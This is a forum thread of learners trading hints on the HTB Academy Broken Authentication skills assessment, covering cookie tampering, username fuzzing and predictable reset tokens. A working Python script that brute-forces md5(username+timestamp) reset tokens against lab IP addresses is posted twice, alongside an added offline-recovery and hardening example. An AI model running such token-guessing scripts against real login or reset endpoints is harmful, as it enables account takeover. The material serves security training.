BROKEN AUTHENTICATION module | HTB Academy

Hi All - Looking for help in pointing me in the right direction for the skills assessment at the end of this course.

I have worked out the cookie encoding and, fuzzing the m****** page, I can only find accounts for guest and support.

I can alter the cookie so that I can be “support” but this always directs me to the error page indicating that “support” cannot log on with that role.

Are there other users that I’m missing? I cannot find any old accounts that are mentioned on the support page and stuck at where to try next.

Any pointers?

First, we have to understand the service on this page: try to enumerate manually, read all content, and understand what it says.
Next, we have to try the functions on it. The important point is to understand this service!

2 Likes

cracked it…thanks Satellite!

Could someone give me a hint for the “Broken Authentication”, “Bruteforcing Usernames” section, ./question2/ Broken Authentication Login - User inference!?
So far I can find neither the pre-filled input nor the ‘failed_login’ cookie, just the “Invalid credentials” in responses.
I have fuzzed the “Username”, “wronguser”, both of them with Burp Intruder and manually using top-usernames-shortlist.txt - nothing interesting. Perhaps I have overlooked something? The response source does not seem to be unusual.

I still can’t get this, I’ve found 4 accounts and cannot cookie them (cannot have requested role). I’ve tried all combinations of ffuf against r*.php and m*.php but no working hit. Any other hint? thanks

Use the dictionary that is mentioned in this section (bruteforcing username).

I have got it in the expected way and it implies with belief in the given hint review the code carefully.

hi all, I can’t find the way to make htbadmin token work. banging my head on wall

I will be happy to help you without spoilers if you still need it.

1 Like

Hi, can you help please? I am converting the time printed on the page to epoch, then adding +1000 -1000. This is my script:
```python
from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://138.68.149.48:32593/question1/"

header = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Content-Type": "application/x-www-form-urlencoded",
}
now = int(1640972294000)  # time shown on the page, as epoch milliseconds
start_time = now
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1000

# Try every millisecond in the window now-1000 .. now+1000
for x in range(start_time - 1000, endtime):
    raw_data = user + str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    # f-string so the computed token is actually placed in the body
    data = f"token={md5_token}&submit=check"

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data, headers=header)

    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```

try it

1 Like

It worked, thanks mate, dunno what was wrong with my epoch

Can you give any more hints?

Hi, I'm stuck in Predictable Reset Token. I rewrote the script but I can't get the token. Can someone help?

Did you keep in mind the different time zones? The displayed time zone is your local time zone in UTC, the server might have a different one. Thus, ±1 s is probably not enough

I take the time given in the server response and pass it as milliseconds, but nothing. I also tried with my time.

Ok, but the given server time zone might not be the real one. Try to use greater offset instead of ±1 s. For speeding things up, try to generate the given token (which can be conducted offline).
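As an added illustration (not code from the thread or from the module), the sketch below shows why a token of the form md5(username + epoch milliseconds), the form the scripts in this thread compute, is recoverable offline as soon as the search window covers the clock offset, and sets it beside a CSPRNG-based token that has no such structure. The account name, timestamps and 90-second skew are constructed sample values.

```python
import hmac
import secrets
from hashlib import md5


def weak_token(user: str, epoch_ms: int) -> str:
    """Scheme discussed in the thread: md5(username + epoch milliseconds)."""
    return md5(f"{user}{epoch_ms}".encode()).hexdigest()


def recover_timestamp(user: str, token: str, guess_ms: int, window_ms: int):
    """Offline search of guess_ms +/- window_ms; returns the epoch that matches or None."""
    for ms in range(guess_ms - window_ms, guess_ms + window_ms + 1):
        if hmac.compare_digest(weak_token(user, ms), token):
            return ms
    return None


def window_keyspace(window_ms: int) -> int:
    """Number of candidate tokens inside a +/- window (the scheme's whole keyspace)."""
    return 2 * window_ms + 1


def strong_token() -> str:
    """Hardened form: 256 bits from the OS CSPRNG, independent of time and username."""
    return secrets.token_urlsafe(32)


def verify(stored: str, presented: str) -> bool:
    """Constant-time comparison of the stored token and the presented one."""
    return hmac.compare_digest(stored, presented)


# Constructed sample values, not taken from the thread.
SAMPLE_USER = "demo"
CLIENT_GUESS_MS = 1_700_000_000_000          # time as the client sees it
SERVER_MS = CLIENT_GUESS_MS + 90_000 + 417   # server clock runs ~90 s ahead

if __name__ == "__main__":
    issued = weak_token(SAMPLE_USER, SERVER_MS)
    # A +/- 1 s window misses the skewed clock; +/- 120 s covers it.
    print(recover_timestamp(SAMPLE_USER, issued, CLIENT_GUESS_MS, 1_000))
    print(recover_timestamp(SAMPLE_USER, issued, CLIENT_GUESS_MS, 120_000))
    print(window_keyspace(120_000), "candidates vs 2**256 for", strong_token())
```

On the server side, the fix is to issue `strong_token()`-style values, store them with a short expiry, and invalidate them after one use.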

Text me If you want!
I will support you!
my discord satellite#1213

I found it, thanks for the help! I got it with wfuzz. I will try it with my script again to find out why it doesn't work.

Can anyone give me a hand with the Predictable Reset Token questions? I am stuck on question 1 right now. I think I should be using something like the python script that is referenced in the module and above. Not sure what I am missing on it.

```python
from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://46.101.81.30:32186/question1/"

header = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Content-Type": "application/x-www-form-urlencoded",
}
now = int(1650581532000)  # time shown on the page, as epoch milliseconds
start_time = now
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1000

# Try every millisecond in the window now-1000 .. now+1000
for x in range(start_time - 1000, endtime):
    raw_data = user + str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    # f-string so the computed token is actually placed in the body
    data = f"token={md5_token}&submit=check"

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data, headers=header)

    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```